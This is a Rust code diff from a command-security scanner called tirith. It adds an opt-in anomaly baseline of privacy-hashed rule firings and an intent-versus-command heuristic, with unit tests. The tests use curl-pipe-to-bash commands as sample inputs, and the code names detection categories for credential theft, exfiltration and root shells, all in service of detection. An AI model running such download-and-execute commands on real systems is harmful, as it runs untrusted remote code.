+    let (sudo_flag, ecosystem) = match segs.first().and_then(|s| s.command.as_deref()) {
+        Some(raw) => {
+            let leader = raw
+                .trim_matches(|c: char| c == '"' || c == '\'')
+                .rsplit('/')
+                .next()
+                .unwrap_or(raw);
+            let sudo = matches!(leader, "sudo" | "doas");
+            // When the leader is a sudo wrapper, classify the WRAPPED command's
+            // ecosystem (first non-flag, non-assignment arg) so `sudo npm i …`
+            // still reads as `npm`.
+            let eco_leader = if sudo {
+                segs.first()
+                    .and_then(|s| {
+                        s.args
+                            .iter()
+                            .map(|a| a.trim_matches(|c: char| c == '"' || c == '\''))
+                            .find(|a| !a.is_empty() && !a.starts_with('-') && !a.contains('='))
+                    })
+                    .map(|a| a.rsplit('/').next().unwrap_or(a))
+                    .unwrap_or(leader)
+            } else {
+                leader
+            };
+            (
+                sudo,
+                baseline_ecosystem_for_leader(eco_leader).map(str::to_string),
+            )
+        }
+        None => (false, None),
+    };
+
+    let cwd_repo_hash = crate::baseline::hash_cwd(ctx.cwd.as_deref());
+    (ecosystem, sudo_flag, cwd_repo_hash)
+}
+
+/// M10 ch5 — the host hash for one finding's tuple, derived from the finding's
+/// own URL evidence (the URL the rule fired on), falling back to the first
+/// extracted URL. Returns `None` when no host is associated.
+fn baseline_host_hash_for_finding(
+    finding: &Finding,
+    extracted: &[crate::extract::ExtractedUrl],
+) -> Option<String> {
+    use crate::verdict::Evidence;
+    // Prefer a URL named in this finding's evidence.
+    let raw = finding
+        .evidence
+        .iter()
+        .find_map(|e| match e {
+            Evidence::Url { raw } => Some(raw.clone()),
+            _ => None,
+        })
+        .or_else(|| extracted.first().map(|u| u.raw.clone()))?;
+    let host = crate::parse::extract_raw_host(&raw)?;
+    if host.is_empty() {
+        return None;
+    }
+    crate::baseline::hash_host(&host)
+}
+
+/// M10 ch5 — anomaly baseline. **Opt-in (D2): a no-op unless
+/// `policy.baseline_enabled` is set.** When enabled AND at least one detection
+/// rule already fired, for each firing finding it builds the privacy-hashed
+/// tuple `(rule_id, host_hash, ecosystem, sudo_flag, cwd_repo_hash)`, looks it
+/// up in the sliding window, and — when the pattern is first-time / rare —
+/// appends an Info-severity anomaly finding. The observation is recorded
+/// regardless of novelty (so the window fills in). Each distinct tuple is
+/// recorded once per analysis, and only ONE anomaly finding is appended per
+/// analysis (the strongest: first-time over rare) to avoid a wall of Info lines
+/// when many rules fire on one command.
+///
+/// Privacy: the store records only salted-sha256 hashes (host, cwd/repo) and
+/// low-cardinality categoricals (ecosystem, sudo) — never raw hostnames/paths.
+/// See `crate::baseline`.
+fn apply_baseline(
+    ctx: &AnalysisContext,
+    policy: &Policy,
+    extracted: &[crate::extract::ExtractedUrl],
+    findings: &mut Vec<Finding>,
+) {
+    use crate::verdict::RuleId;
+
+    if !policy.baseline_enabled {
+        return; // D2: default OFF — zero baseline I/O on the hot path.
+    }
+    // Only react to findings that already fired. Skip the anomaly rules
+    // themselves so we never observe-on-observe.
+    let real_findings: Vec<usize> = findings
+        .iter()
+        .enumerate()
+        .filter(|(_, f)| {
+            !matches!(
+                f.rule_id,
+                RuleId::AnomalyFirstTimeInThisRepo | RuleId::AnomalyRareInBaseline
+            )
+        })
+        .map(|(i, _)| i)
+        .collect();
+    if real_findings.is_empty() {
+        return;
+    }
+
+    let (ecosystem, sudo_flag, cwd_repo_hash) = baseline_shared_components(ctx);
+
+    // De-duplicate tuples within this single analysis: record each unique tuple
+    // once, and track the strongest novelty seen so we surface at most one
+    // anomaly finding.
+    let mut seen_tuples: std::collections::HashSet<crate::baseline::PatternKey> =
+        std::collections::HashSet::new();
+    let mut best: Option<(crate::verdict::RuleId, String)> = None; // (anomaly rule, the rule that triggered it)
+
+    for &idx in &real_findings {
+        let finding = &findings[idx];
+        let host_hash = baseline_host_hash_for_finding(finding, extracted);
+        let key = crate::baseline::PatternKey {
+            rule_id: finding.rule_id.to_string(),
+            host_hash,
+            ecosystem: ecosystem.clone(),
+            sudo_flag,
+            cwd_repo_hash: cwd_repo_hash.clone(),
+        };
+        if !seen_tuples.insert(key.clone()) {
+            continue; // already handled this exact tuple in this analysis
+        }
+
+        let seen = crate::baseline::lookup(&key);
+        if let Some(rule) = crate::baseline::anomaly_rule(seen) {
+            // first-time (count 0) beats rare (count 1..2): prefer the lower count.
+            let promote = match &best {
+                None => true,
+                Some((RuleId::AnomalyRareInBaseline, _)) => {
+                    rule == RuleId::AnomalyFirstTimeInThisRepo
+                }
+                _ => false,
+            };
+            if promote {
+                best = Some((rule, finding.rule_id.to_string()));
+            }
+        }
+
+        // Record the observation regardless of novelty (best-effort; an I/O
+        // failure must never break the verdict).
+        let _ = crate::baseline::record(key);
+    }
+
+    if let Some((anomaly_rule, triggering_rule)) = best {
+        findings.push(baseline_finding(anomaly_rule, &triggering_rule));
+    }
+}
+
+/// Build an Info-severity anomaly finding. `triggering_rule` is the rule whose
+/// firing pattern was novel — named so `tirith why` shows the connection.
+fn baseline_finding(rule_id: crate::verdict::RuleId, triggering_rule: &str) -> Finding {
+    use crate::verdict::{Evidence, RuleId, Severity};
+    let (title, detail) = match rule_id {
+        RuleId::AnomalyFirstTimeInThisRepo => (
+            "First time seen in your baseline",
+            format!(
+                "The pattern for `{triggering_rule}` (privacy-hashed: rule + host + \
+                 ecosystem + sudo + repo) has not appeared in your 90-day baseline. \
+                 This is informational and does not change the verdict."
+            ),
+        ),
+        RuleId::AnomalyRareInBaseline => (
+            "Rare in your baseline",
+            format!(
+                "The pattern for `{triggering_rule}` has been seen only rarely \
+                 (fewer than 3 times) in your 90-day baseline. Informational; does \
+                 not change the verdict."
+            ),
+        ),
+        // Not reachable — apply_baseline only constructs the two anomaly rules.
+        _ => ("Baseline anomaly", String::new()),
+    };
+    Finding {
+        rule_id,
+        severity: Severity::Info,
+        title: title.to_string(),
+        description: detail,
+        evidence: vec![Evidence::Text {
+            detail: format!("baseline novelty for rule: {triggering_rule}"),
+        }],
+        human_view: None,
+        agent_view: None,
+        mitre_id: Some("T1078".to_string()),
+        custom_rule_id: None,
+    }
+}
+
 /// The `/tmp`-equivalent roots: `/tmp` plus `$TMPDIR` (macOS uses a per-user
 /// `$TMPDIR` under `/var/folders`). Used by the hot-path `ExecInTmp` /
 /// writable-dir checks.
@@ -1659,6 +1881,14 @@ fn analyze_inner(ctx: &AnalysisContext) -> (Verdict, Policy) {
                     .all(|url| policy.is_allowlisted(url) || rule_allowlisted(url))
         });
     }
+
+    // M10 ch5 — anomaly baseline (opt-in, D2). When `policy.baseline_enabled`
+    // is set AND at least one detection rule fired, look up each firing
+    // finding's privacy-hashed tuple in the sliding window and append an Info
+    // anomaly finding for a first-time / rare pattern; record the observation
+    // regardless. A no-op (zero baseline I/O) when the flag is off — the common
+    // case. Runs before enrichment so the anomaly finding is enriched too.
+    apply_baseline(ctx, &policy, &extracted, &mut findings);
 
     enrich_pro(&mut findings);
     enrich_team(&mut findings);
@@ -2856,5 +3086,100 @@ mod tests {
         // No marks written.
         let ctx = exec_ctx_in("bash ./install.sh", dir.path());
         assert!(check_taint_hot_with_store(&ctx, &store).is_empty());
+    }
+
+    // ---- M10 ch5 — anomaly-baseline wiring tests ---------------------------
+    //
+    // The store-level record/lookup/classification logic is covered exhaustively
+    // by `crate::baseline`'s own unit tests (against a tempdir). These tests
+    // cover the ENGINE wiring: (a) the opt-in guarantee — with the flag off,
+    // `apply_baseline` touches nothing and appends nothing — and (b) the shared
+    // tuple-component derivation (ecosystem / sudo classification). Neither test
+    // touches the real `state_dir()` or mutates env: the disabled-path test
+    // never reaches `crate::baseline`, and the component test is pure parsing.
+
+    fn synthetic_finding(rule_id: crate::verdict::RuleId) -> Finding {
+        use crate::verdict::Severity;
+        Finding {
+            rule_id,
+            severity: Severity::High,
+            title: "synthetic".into(),
+            description: String::new(),
+            evidence: vec![],
+            human_view: None,
+            agent_view: None,
+            mitre_id: None,
+            custom_rule_id: None,
+        }
+    }
+
+    #[test]
+    fn apply_baseline_is_noop_when_disabled() {
+        // D2 opt-in guarantee: with `baseline_enabled` false (the default),
+        // apply_baseline must NOT append any anomaly finding and must not touch
+        // the store. We assert the findings list is left exactly as-is.
+        let ctx = exec_ctx("curl https://example.com/install.sh | bash");
+        let policy = Policy::default(); // baseline_enabled == false
+        assert!(!policy.baseline_enabled, "default must be OFF");
+        let mut findings = vec![synthetic_finding(crate::verdict::RuleId::CurlPipeShell)];
+        let before = findings.len();
+        apply_baseline(&ctx, &policy, &[], &mut findings);
+        assert_eq!(
+            findings.len(),
+            before,
+            "disabled baseline must not append any anomaly finding"
+        );
+        assert!(
+            findings.iter().all(|f| !matches!(
+                f.rule_id,
+                crate::verdict::RuleId::AnomalyFirstTimeInThisRepo
+                    | crate::verdict::RuleId::AnomalyRareInBaseline
+            )),
+            "no anomaly rule when disabled"
+        );
+    }
+
+    #[test]
+    fn apply_baseline_noop_when_no_real_findings() {
+        // Even enabled, with only anomaly findings present (or none), there is
+        // nothing to observe — apply_baseline must not loop on itself.
+        let ctx = exec_ctx("echo hi");
+        let policy = Policy {
+            baseline_enabled: true,
+            ..Policy::default()
+        };
+        let mut findings: Vec<Finding> = vec![];
+        apply_baseline(&ctx, &policy, &[], &mut findings);
+        assert!(findings.is_empty(), "no findings in, no findings out");
+    }
+
+    #[test]
+    fn baseline_shared_components_classifies_sudo_and_ecosystem() {
+        // `sudo npm install …` → sudo_flag true, ecosystem npm (the wrapped
+        // command's ecosystem, not sudo's).
+        let ctx = exec_ctx("sudo npm install left-pad");
+        let (eco, sudo, _cwd) = baseline_shared_components(&ctx);
+        assert!(sudo, "sudo leader → sudo_flag true");
+        assert_eq!(eco.as_deref(), Some("npm"), "wrapped ecosystem classified");
+
+        // Plain `pip3 install x` → not sudo, ecosystem pypi.
+        let ctx2 = exec_ctx("pip3 install requests");
+        let (eco2, sudo2, _) = baseline_shared_components(&ctx2);
+        assert!(!sudo2);
+        assert_eq!(eco2.as_deref(), Some("pypi"));
+
+        // A non-ecosystem command → no ecosystem label, not sudo.
+        let ctx3 = exec_ctx("echo hello");
+        let (eco3, sudo3, _) = baseline_shared_components(&ctx3);
+        assert!(!sudo3);
+        assert_eq!(eco3, None);
+    }
+
+    #[test]
+    fn baseline_ecosystem_leader_map_covers_common_managers() {
+        assert_eq!(baseline_ecosystem_for_leader("docker"), Some("docker"));
+        assert_eq!(baseline_ecosystem_for_leader("cargo"), Some("crates"));
+        assert_eq!(baseline_ecosystem_for_leader("kubectl"), Some("k8s"));
+        assert_eq!(baseline_ecosystem_for_leader("ls"), None);
     }
 }

--- a/crates/tirith-core/src/intent.rs
+++ b/crates/tirith-core/src/intent.rs
@@ -1,0 +1,650 @@
+//! `tirith intend` — intent-vs-command heuristic (M10 ch4).
+//!
+//! ## What this is
+//!
+//! A **pure-Rust, no-LLM** heuristic that flags when a *stated intent* ("install
+//! a formatter") doesn't justify what the command *actually does* (pipe a remote
+//! script straight into a shell). It computes an [`IntentBehaviorReport`] with
+//! three parts:
+//!
+//! - `intent_signals`  — which intent keyword groups the stated intent matched
+//!   (e.g. `install`, `test`, `build`). One natural-language sentence can match
+//!   several.
+//! - `command_signals` — the high-impact behaviors the command exhibits, derived
+//!   from the SHIPPING engine rules. `intend` runs [`crate::engine::analyze`] on
+//!   the command and maps each [`RuleId`](crate::verdict::RuleId) that fired to a
+//!   named [`CommandSignal`]. This keeps the signals consistent with the rest of
+//!   tirith rather than re-implementing detection.
+//! - `mismatches`      — every command signal that is HIGH-IMPACT *and* not
+//!   justified by any matched intent. A mismatch is the heuristic's output.
+//!
+//! ## What this is NOT
+//!
+//! - It is **advisory and Info-level only**. It NEVER blocks. The command's real
+//!   security verdict comes from `tirith check`; `intend` only answers "does the
+//!   thing you said you wanted match the thing this command does?".
+//! - It is a HEURISTIC. Natural-language intent classification by keyword is
+//!   necessarily incomplete — a phrasing it doesn't recognize yields no intent
+//!   signals, so EVERY high-impact command signal then reads as unjustified. The
+//!   caller renders this honestly.
+//! - There is NO LLM call here and none is wired. A future `--llm-explain` wave
+//!   may add one; M10 is pure heuristic.
+
+use serde::Serialize;
+
+use crate::engine::{self, AnalysisContext};
+use crate::extract::ScanContext;
+use crate::tokenize::ShellType;
+use crate::verdict::RuleId;
+
+/// A high-impact behavior the analyzed command exhibits, derived from the
+/// engine rule that fired. The mapping from [`RuleId`] to `CommandSignal` is in
+/// [`CommandSignal::from_rule`]. Signals that share an intuitive meaning
+/// (every "pipe a download into an interpreter" rule) collapse to one variant
+/// so the user-facing report stays readable.
+#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, PartialOrd, Ord, Serialize)]
+#[serde(rename_all = "snake_case")]
+pub enum CommandSignal {
+    /// A remote download is piped straight into a shell / interpreter
+    /// (`curl … | bash`, `iwr … | iex`, `wget -O- | sh`).
+    DownloadPipe,
+    /// The command escalates privileges with `sudo` (any of the M8 ch4 sudo
+    /// rules fired).
+    Sudo,
+    /// The command reads/sweeps credential files or exfiltrates data over the
+    /// network (`DataExfiltration`, `CredentialFileSweep`, sensitive-env export
+    /// into a sink).
+    EnvOrCredentialExfil,
+    /// The command writes to a shell rc / profile (a persistence foothold).
+    ShellRcWrite,
+    /// The command runs a package-manager install (`pip install`, `npm install`,
+    /// remote `pip`/`npm` URL install, untrusted Docker registry, etc.).
+    PackageInstall,
+    /// The command decodes a base64 blob and executes it.
+    Base64Execute,
+    /// The command opens an interactive root shell (`sudo bash`).
+    RootShell,
+}
+
+impl CommandSignal {
+    /// Stable lowercase token used in human + JSON output.
+    pub fn as_str(self) -> &'static str {
+        match self {
+            CommandSignal::DownloadPipe => "download_pipe",
+            CommandSignal::Sudo => "sudo",
+            CommandSignal::EnvOrCredentialExfil => "env_or_credential_exfil",
+            CommandSignal::ShellRcWrite => "shell_rc_write",
+            CommandSignal::PackageInstall => "package_install",
+            CommandSignal::Base64Execute => "base64_execute",
+            CommandSignal::RootShell => "root_shell",
+        }
+    }
+
+    /// One-line human label for the signal.
+    pub fn label(self) -> &'static str {
+        match self {
+            CommandSignal::DownloadPipe => "pipes a remote download into a shell",
+            CommandSignal::Sudo => "escalates privileges with sudo",
+            CommandSignal::EnvOrCredentialExfil => "reads credentials or sends data off-host",
+            CommandSignal::ShellRcWrite => "writes a shell rc/profile (persistence)",
+            CommandSignal::PackageInstall => "installs a package from a package manager",
+            CommandSignal::Base64Execute => "decodes and executes a base64 blob",
+            CommandSignal::RootShell => "opens an interactive root shell",
+        }
+    }
+
+    /// Whether this signal is "high impact" — i.e. worth flagging when the
+    /// stated intent does not justify it. `PackageInstall` is intentionally NOT
+    /// high-impact: installing a package is exactly what most build/test/install
+    /// intents are FOR, and flagging it would drown the signal. The high-impact
+    /// set is the surprising, persistence-/exfil-/privilege-shaped behaviors.
+    pub fn is_high_impact(self) -> bool {
+        match self {
+            CommandSignal::DownloadPipe
+            | CommandSignal::Sudo
+            | CommandSignal::EnvOrCredentialExfil
+            | CommandSignal::ShellRcWrite
+            | CommandSignal::Base64Execute
+            | CommandSignal::RootShell => true,
+            CommandSignal::PackageInstall => false,
+        }
+    }
+
+    /// Map an engine [`RuleId`] to a `CommandSignal`, or `None` when the rule
+    /// is not one of the behaviors `intend` reasons about (homograph hostnames,
+    /// terminal-deception bytes, file-scan findings, etc. are out of scope —
+    /// `intend` is about *what the command does to the machine*, which the
+    /// command-shape / ecosystem / sudo rules capture).
+    pub fn from_rule(rule: RuleId) -> Option<CommandSignal> {
+        match rule {
+            // Download-pipe family.
+            RuleId::PipeToInterpreter
+            | RuleId::CurlPipeShell
+            | RuleId::WgetPipeShell
+            | RuleId::HttpiePipeShell
+            | RuleId::XhPipeShell
+            | RuleId::PsInlineDownloadExecute => Some(CommandSignal::DownloadPipe),
+
+            // Base64 decode-and-execute.
+            RuleId::Base64DecodeExecute => Some(CommandSignal::Base64Execute),
+
+            // Credential sweep / data exfiltration / sensitive-env into a sink.
+            RuleId::CredentialFileSweep
+            | RuleId::DataExfiltration
+            | RuleId::SensitiveEnvExport
+            | RuleId::ProcMemAccess => Some(CommandSignal::EnvOrCredentialExfil),
+
+            // Sudo escalation family (M8 ch4).
+            RuleId::SudoShellSpawn => Some(CommandSignal::RootShell),
+            RuleId::SudoEnvPreserveSensitive
+            | RuleId::SudoTeeSystemFile
+            | RuleId::SudoDownloadInstall
+            | RuleId::SudoRecursivePermsBroadPath => Some(CommandSignal::Sudo),
+
+            // Package-manager install family.
+            RuleId::PipUrlInstall
+            | RuleId::NpmUrlInstall
+            | RuleId::DockerUntrustedRegistry
+            | RuleId::DockerRemotePrivEsc
+            | RuleId::BrewUntrustedTap
+            | RuleId::HelmUntrustedRepo
+            | RuleId::RepoAddFromPipe => Some(CommandSignal::PackageInstall),
+
+            _ => None,
+        }
+    }
+}
+
+/// A coarse classification of the stated intent, derived from keyword groups.
+/// One sentence can match several (so `IntentBehaviorReport::intent_signals` is
+/// a set). Each class declares which [`CommandSignal`]s it *justifies* via
+/// [`IntentClass::justifies`].
+#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, PartialOrd, Ord, Serialize)]
+#[serde(rename_all = "snake_case")]
+pub enum IntentClass {
+    /// "install", "add a dependency", "set up", "bootstrap".
+    Install,
+    /// "download", "fetch", "pull", "curl", "get … from the internet".
+    Download,
+    /// "run", "execute", "launch" an installer/script.
+    RunScript,
+    /// "test", "check", "run the tests".
+    Test,
+    /// "build", "compile", "bundle".
+    Build,
+    /// "format", "lint", "fmt", "tidy".
+    Format,
+    /// "clean", "remove build artifacts", "purge".
+    Clean,
+    /// "deploy", "release", "publish", "ship".
+    Deploy,
+    /// "configure", "set up config", "edit settings".
+    Configure,
+}
+
+impl IntentClass {
+    /// Stable lowercase token used in human + JSON output.
+    pub fn as_str(self) -> &'static str {
+        match self {
+            IntentClass::Install => "install",
+            IntentClass::Download => "download",
+            IntentClass::RunScript => "run_script",
+            IntentClass::Test => "test",
+            IntentClass::Build => "build",
+            IntentClass::Format => "format",
+            IntentClass::Clean => "clean",
+            IntentClass::Deploy => "deploy",
+            IntentClass::Configure => "configure",
+        }
+    }
+
+    /// The keyword stems that, when present as a whole word in the stated
+    /// intent, classify it into this group. Matching is whole-word and
+    /// case-insensitive (see [`classify_intent`]).
+    fn keywords(self) -> &'static [&'static str] {
+        match self {
+            IntentClass::Install => &[
+                "install",
+                "installer",
+                "installing",
+                "setup",
+                "bootstrap",
+                "provision",
+                "add",
+                "dependency",
+                "dependencies",
+            ],
+            IntentClass::Download => &[
+                "download",
+                "downloading",
+                "fetch",
+                "fetching",
+                "pull",
+                "curl",
+                "wget",
+                "retrieve",
+                "grab",
+            ],
+            IntentClass::RunScript => &[
+                "run", "running", "execute", "exec", "launch", "invoke", "script",
+            ],
+            IntentClass::Test => &[
+                "test", "tests", "testing", "check", "verify", "spec", "specs",
+            ],
+            IntentClass::Build => &[
+                "build",
+                "building",
+                "compile",
+                "compiling",
+                "bundle",
+                "package",
+            ],
+            IntentClass::Format => &[
+                "format",
+                "formatter",
+                "formatting",
+                "fmt",
+                "lint",
+                "linter",
+                "linting",
+                "tidy",
+                "prettier",
+                "reformat",
+            ],
+            IntentClass::Clean => &[
+                "clean", "cleaning", "remove", "purge", "delete", "clear", "wipe", "prune",
+            ],
+            IntentClass::Deploy => &[
+                "deploy",
+                "deploying",
+                "release",
+                "publish",
+                "ship",
+                "rollout",
+                "promote",
+            ],
+            IntentClass::Configure => &[
+                "configure",
+                "config",
+                "configuration",
+                "settings",
+                "set",
+                "edit",
+                "customize",
+            ],
+        }
+    }
+
+    /// The command signals this intent class JUSTIFIES — i.e. signals that, when
+    /// they fire, are an expected consequence of doing the stated thing and so do
+    /// NOT count as a mismatch.
+    ///
+    /// The discipline is narrow on purpose (per the project's "narrow carveouts"
+    /// rule): a class justifies only what its name plainly implies. "install" /
+    /// "download" / "run a script" justify the download-pipe shape (that IS how
+    /// many installers work); "deploy" additionally justifies privilege use.
+    /// "format" / "test" / "build" / "clean" justify a package install (a
+    /// formatter is a package) but NOT piping a remote script to a shell, NOT
+    /// sudo, NOT exfil.
+    fn justifies(self) -> &'static [CommandSignal] {
+        match self {
+            // Explicitly download-and-run intents justify the pipe-to-shell shape
+            // and the package install that usually follows.
+            IntentClass::Install => &[CommandSignal::PackageInstall],
+            IntentClass::Download => &[CommandSignal::DownloadPipe],
+            IntentClass::RunScript => &[CommandSignal::DownloadPipe, CommandSignal::Base64Execute],
+
+            // Deploy/release commonly need privilege and may push artifacts.
+            IntentClass::Deploy => &[
+                CommandSignal::Sudo,
+                CommandSignal::PackageInstall,
+                CommandSignal::ShellRcWrite,
+            ],
+
+            // Configure justifies writing config (incl. a shell rc).
+            IntentClass::Configure => &[CommandSignal::ShellRcWrite],
+
+            // Build/test/format/clean justify installing a package (the tool is a
+            // package) but nothing surprising.
+            IntentClass::Test | IntentClass::Build | IntentClass::Format | IntentClass::Clean => {
+                &[CommandSignal::PackageInstall]
+            }
+        }
+    }
+
+    /// All classes, for iteration during classification.
+    const ALL: [IntentClass; 9] = [
+        IntentClass::Install,
+        IntentClass::Download,
+        IntentClass::RunScript,
+        IntentClass::Test,
+        IntentClass::Build,
+        IntentClass::Format,
+        IntentClass::Clean,
+        IntentClass::Deploy,
+        IntentClass::Configure,
+    ];
+}
+
+/// A single intent-class match, recording which class fired and which keyword
+/// triggered it (for `--explain` derivation).
+#[derive(Debug, Clone, Serialize)]
+pub struct IntentSignal {
+    pub class: IntentClass,
+    /// The keyword from the stated intent that matched this class.
+    pub matched_keyword: String,
+}
+
+/// A flagged mismatch: a high-impact command signal that no matched intent
+/// justified.
+#[derive(Debug, Clone, Serialize)]
+pub struct Mismatch {
+    pub signal: CommandSignal,
+    /// Human-readable reason — what the command does vs what the intent implied.
+    pub reason: String,
+}
+
+/// One derivation step for `--explain`: why a command signal was or was not a
+/// mismatch, naming the intent class (if any) that justified it.
+#[derive(Debug, Clone, Serialize)]
+pub struct Derivation {
+    pub signal: CommandSignal,
+    /// `true` when this signal was flagged as a mismatch.
+    pub mismatch: bool,
+    /// The intent class that justified this signal, if any.
+    #[serde(skip_serializing_if = "Option::is_none")]
+    pub justified_by: Option<IntentClass>,
+    pub detail: String,
+}
+
+/// The full report `tirith intend` produces.
+#[derive(Debug, Clone, Serialize)]
+pub struct IntentBehaviorReport {
+    /// The intent classes the stated intent matched.
+    pub intent_signals: Vec<IntentSignal>,
+    /// The high-impact behaviors the command exhibits (deduped, sorted).
+    pub command_signals: Vec<CommandSignal>,
+    /// Every high-impact command signal not justified by a matched intent.
+    pub mismatches: Vec<Mismatch>,
+    /// Per-signal derivation, populated only when `--explain` is requested.
+    #[serde(skip_serializing_if = "Vec::is_empty")]
+    pub derivation: Vec<Derivation>,
+}
+
+impl IntentBehaviorReport {
+    /// `true` when at least one mismatch was found.
+    pub fn has_mismatch(&self) -> bool {
+        !self.mismatches.is_empty()
+    }
+}
+
+/// Split the stated intent into lowercase ASCII alphanumeric words. Punctuation
+/// becomes a separator so `"format,lint"` yields two words. Hyphens split too,
+/// so `"set-up"` matches the `set` / `up` stems.
+fn intent_words(intent: &str) -> Vec<String> {
+    intent
+        .split(|c: char| !c.is_ascii_alphanumeric())
+        .filter(|w| !w.is_empty())
+        .map(|w| w.to_ascii_lowercase())
+        .collect()
+}
+
+/// Classify the stated intent into a set of [`IntentSignal`]s by whole-word
+/// keyword match. Deterministic order: classes in [`IntentClass::ALL`] order,
+/// first matching keyword per class.
+pub fn classify_intent(intent: &str) -> Vec<IntentSignal> {
+    let words = intent_words(intent);
+    let mut signals = Vec::new();
+    for class in IntentClass::ALL {
+        if let Some(kw) = class
+            .keywords()
+            .iter()
+            .find(|kw| words.iter().any(|w| w == **kw))
+        {
+            signals.push(IntentSignal {
+                class,
+                matched_keyword: (*kw).to_string(),
+            });
+        }
+    }
+    signals
+}
+
+/// Derive the deduped, sorted set of [`CommandSignal`]s for `command` by running
+/// the shipping engine and mapping each fired rule. This reuses
+/// [`crate::engine::analyze`] so the signals stay consistent with `tirith
+/// check` rather than re-implementing detection.
+pub fn command_signals(command: &str, shell: ShellType) -> Vec<CommandSignal> {
+    let ctx = AnalysisContext {
+        input: command.to_string(),
+        shell,
+        scan_context: ScanContext::Exec,
+        raw_bytes: None,
+        interactive: false,
+        cwd: None,
+        file_path: None,
+        repo_root: None,
+        is_config_override: false,
+        clipboard_html: None,
+    };
+    let verdict = engine::analyze(&ctx);
+
+    let mut signals: Vec<CommandSignal> = verdict
+        .findings
+        .iter()
+        .filter_map(|f| CommandSignal::from_rule(f.rule_id))
+        .collect();
+    signals.sort();
+    signals.dedup();
+    signals
+}
+
+/// Compute the full intent-vs-command report. When `explain` is true, the
+/// `derivation` field is populated with a per-signal trace.
+pub fn analyze_intent(
+    intent: &str,
+    command: &str,
+    shell: ShellType,
+    explain: bool,
+) -> IntentBehaviorReport {
+    let intent_signals = classify_intent(intent);
+    let command_signals = command_signals(command, shell);
+
+    // A signal is justified when ANY matched intent class justifies it.
+    let justified_by = |signal: CommandSignal| -> Option<IntentClass> {
+        intent_signals
+            .iter()
+            .find(|s| s.class.justifies().contains(&signal))
+            .map(|s| s.class)
+    };
+
+    let mut mismatches = Vec::new();
+    let mut derivation = Vec::new();
+
+    for &signal in &command_signals {
+        let justifier = justified_by(signal);
+        let high_impact = signal.is_high_impact();
+        let is_mismatch = high_impact && justifier.is_none();
+
+        if is_mismatch {
+            mismatches.push(Mismatch {
+                signal,
+                reason: format!(
+                    "the command {} but the stated intent does not justify that",
+                    signal.label()
+                ),
+            });
+        }
+
+        if explain {
+            let detail = if !high_impact {
+                format!(
+                    "command {} — not a high-impact behavior, never a mismatch",
+                    signal.label()
+                )
+            } else if let Some(class) = justifier {
+                format!(
+                    "command {} — justified by intent '{}'",
+                    signal.label(),
+                    class.as_str()
+                )
+            } else {
+                format!(
+                    "command {} — NOT justified by any matched intent → mismatch",
+                    signal.label()
+                )
+            };
+            derivation.push(Derivation {
+                signal,
+                mismatch: is_mismatch,
+                justified_by: justifier,
+                detail,
+            });
+        }
+    }
+
+    IntentBehaviorReport {
+        intent_signals,
+        command_signals,
+        mismatches,
+        derivation,
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn classify_install_a_formatter() {
+        let sigs = classify_intent("install a formatter");
+        let classes: Vec<_> = sigs.iter().map(|s| s.class).collect();
+        assert!(classes.contains(&IntentClass::Install), "got {classes:?}");
+        assert!(classes.contains(&IntentClass::Format), "got {classes:?}");
+        // "install a formatter" must NOT classify as an explicit download/run.
+        assert!(!classes.contains(&IntentClass::Download), "got {classes:?}");
+        assert!(
+            !classes.contains(&IntentClass::RunScript),
+            "got {classes:?}"
+        );
+    }
+
+    #[test]
+    fn classify_download_and_run_an_installer() {
+        let sigs = classify_intent("download and run an installer");
+        let classes: Vec<_> = sigs.iter().map(|s| s.class).collect();
+        assert!(classes.contains(&IntentClass::Download), "got {classes:?}");
+        assert!(classes.contains(&IntentClass::RunScript), "got {classes:?}");
+    }
+
+    #[test]
+    fn classify_is_case_insensitive_and_whole_word() {
+        let sigs = classify_intent("INSTALL the deps");
+        assert!(sigs.iter().any(|s| s.class == IntentClass::Install));
+        // "reinstall" should NOT match the whole word "install".
+        let none = classify_intent("reinstallation notes");
+        assert!(
+            !none.iter().any(|s| s.class == IntentClass::Install),
+            "whole-word match must not fire on substrings: {none:?}"
+        );
+    }
+
+    #[test]
+    fn command_signals_download_pipe() {
+        let sigs = command_signals("curl https://x/install.sh | bash", ShellType::Posix);
+        assert!(
+            sigs.contains(&CommandSignal::DownloadPipe),
+            "expected download_pipe, got {sigs:?}"
+        );
+    }
+
+    #[test]
+    fn command_signals_clean_command_empty() {
+        let sigs = command_signals("ls -la", ShellType::Posix);
+        assert!(
+            sigs.is_empty(),
+            "clean command should have no signals: {sigs:?}"
+        );
+    }
+
+    #[test]
+    fn install_formatter_vs_curl_pipe_is_mismatch() {
+        let report = analyze_intent(
+            "install a formatter",
+            "curl https://x/install.sh | bash",
+            ShellType::Posix,
+            false,
+        );
+        assert!(
+            report.has_mismatch(),
+            "install-a-formatter should not justify curl|bash: {report:?}"
+        );
+        assert!(report
+            .mismatches
+            .iter()
+            .any(|m| m.signal == CommandSignal::DownloadPipe));
+    }
+
+    #[test]
+    fn download_and_run_vs_curl_pipe_is_clean() {
+        let report = analyze_intent(
+            "download and run an installer",
+            "curl https://x/install.sh | bash",
+            ShellType::Posix,
+            false,
+        );
+        assert!(
+            !report.has_mismatch(),
+            "download-and-run explicitly justifies curl|bash: {report:?}"
+        );
+    }
+
+    #[test]
+    fn explain_populates_derivation() {
+        let report = analyze_intent(
+            "install a formatter",
+            "curl https://x/install.sh | bash",
+            ShellType::Posix,
+            true,
+        );
+        assert!(
+            !report.derivation.is_empty(),
+            "explain must populate derivation"
+        );
+        let d = report
+            .derivation
+            .iter()
+            .find(|d| d.signal == CommandSignal::DownloadPipe)
+            .expect("download_pipe derivation present");
+        assert!(d.mismatch, "download_pipe should be a flagged mismatch");
+        assert!(d.justified_by.is_none());
+    }
+
+    #[test]
+    fn no_explain_leaves_derivation_empty() {
+        let report = analyze_intent(
+            "install a formatter",
+            "curl https://x/install.sh | bash",
+            ShellType::Posix,
+            false,
+        );
+        assert!(report.derivation.is_empty());
+    }
+
+    #[test]
+    fn package_install_not_high_impact() {
+        // PackageInstall is not high-impact, so even with an unrelated intent it
+        // never flags a mismatch on its own.
+        assert!(!CommandSignal::PackageInstall.is_high_impact());
+        assert!(CommandSignal::DownloadPipe.is_high_impact());
+    }
+
+    #[test]
+    fn unknown_rule_maps_to_none() {
+        assert_eq!(CommandSignal::from_rule(RuleId::NonAsciiHostname), None);
+        assert_eq!(
+            CommandSignal::from_rule(RuleId::CurlPipeShell),
